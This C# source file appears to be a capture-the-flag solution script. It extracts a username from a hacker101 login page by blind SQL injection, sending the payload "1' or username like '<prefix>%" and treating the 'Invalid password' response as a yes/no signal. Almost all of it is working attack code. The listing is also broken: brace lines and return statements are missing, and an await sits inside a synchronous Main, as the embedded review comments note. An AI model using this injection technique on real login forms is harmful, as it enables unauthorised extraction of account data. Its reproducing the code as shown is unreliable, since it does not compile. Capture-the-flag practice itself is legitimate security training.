using System.Threading.Tasks;
// Entry point: recovers the value of one login-table column one character at a
// time, using the login form's response text as a true/false signal.
// NOTE(review): brace-only lines (and possibly a break/return after the "was found"
// message) appear to be missing from this listing, so block nesting is not visible.
// NOTE(review): the body uses await, but the signature is a synchronous void; as
// written this needs an async Task-returning Main to compile.
public static void Main(string[] args)
// Login endpoint of the hacker101 CTF instance that every request is posted to.
const string LoginUrl = "https://f4b59c2cec5a21957a948ef2b7b4f779.ctf.hacker101.com/login";
// Name of the column whose value is being recovered; it is interpolated into the LIKE predicate.
const string BruteForceField = "username";
// Upper bound on the number of characters recovered (one outer-loop pass per character).
const int MaxFieldLength = 10;
// One HttpClient shared by every request; SendAuthRequest reads this local.
var httpClient = new HttpClient();
// Prefix confirmed so far; starts empty and grows by one character per pass.
var bruteforceStartString = string.Empty;
for (var i = 1; i <= MaxFieldLength; i++)
// Ask for the confirmed prefix extended by one more matching character.
var result = await BruteforceField(bruteforceStartString, BruteForceField);
// A null or empty result is treated as "no longer prefix matched", i.e. the value is complete.
if (string.IsNullOrEmpty(result))
Console.WriteLine($"{BruteForceField} was found");
// Otherwise adopt the longer prefix and report progress.
bruteforceStartString = result;
Console.WriteLine($"{BruteForceField} starts with: {bruteforceStartString}");
// Searches for the next character of `field` by appending 'a', 'b', ... to the
// known prefix and sending each candidate as a LIKE prefix pattern.
// Only lowercase a-z candidates are generated.
// NOTE(review): the statements that return a value (on a match and after the loop)
// are not visible in this listing; the caller treats a null or empty result as
// "no further character" and any other result as the new prefix.
async Task<string> BruteforceField(string startString, string field)
// The loop below terminates when the candidate equals this value.
var endString = $"{startString}z";
// First candidate: known prefix + 'a'.
startString = $"{startString}a";
for (; startString != endString; startString = IncrementString(startString))
// The value sent as the username closes a quoted SQL literal and appends
// `or <field> like '<candidate>%'`. This only changes the query if the server
// builds its SQL by string concatenation; a parameterized query would treat the
// whole value as data. The closing quote is presumably supplied by the server's
// own query text -- TODO confirm.
var response = await SendAuthRequest($"1' or {field} like '{startString}%");
// "Invalid password" is used as the signal that some row matched the predicate;
// presumably the page shows a different message when no user matches. A single
// generic login error for both cases would remove this signal.
if (response.Contains("Invalid password"))
// Returns `value` advanced by one step, treating its characters as digits of a
// counter: the character at `position` (default: the last one) is incremented,
// and a 'z' rolls over to 'a' with the carry moving one position to the left.
// A carry that runs off the left edge (e.g. an all-'z' or empty string) indexes
// position -1 and throws IndexOutOfRangeException.
string IncrementString(string value, int? position = null)
{
    var chars = value.ToCharArray();
    var index = position ?? chars.Length - 1;

    // Roll every 'z' at or to the left of the start position over to 'a'.
    while (chars[index] == 'z')
    {
        chars[index] = 'a';
        index--;
    }

    // First non-'z' character absorbs the carry.
    chars[index] = (char)(chars[index] + 1);
    return new string(chars);
}
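// Posts the login form to LoginUrl with the given username value and an empty
// password, and returns the response body as text.
// The username is sent exactly as supplied; FormUrlEncodedContent encodes it for
// transport only, so whatever the caller passes reaches the server-side login
// handler unchanged after form decoding.
async Task<string> SendAuthRequest(string username)
{
    var credentials = new Dictionary<string, string>
    {
        { "username", username },
        { "password", string.Empty }
    };

    // Dispose the response once its body has been read: this method is called
    // once per candidate, and undisposed responses hold their connection and
    // buffers until finalization.
    using var response = await httpClient.PostAsync(LoginUrl, new FormUrlEncodedContent(credentials));
    return await response.Content.ReadAsStringAsync();
}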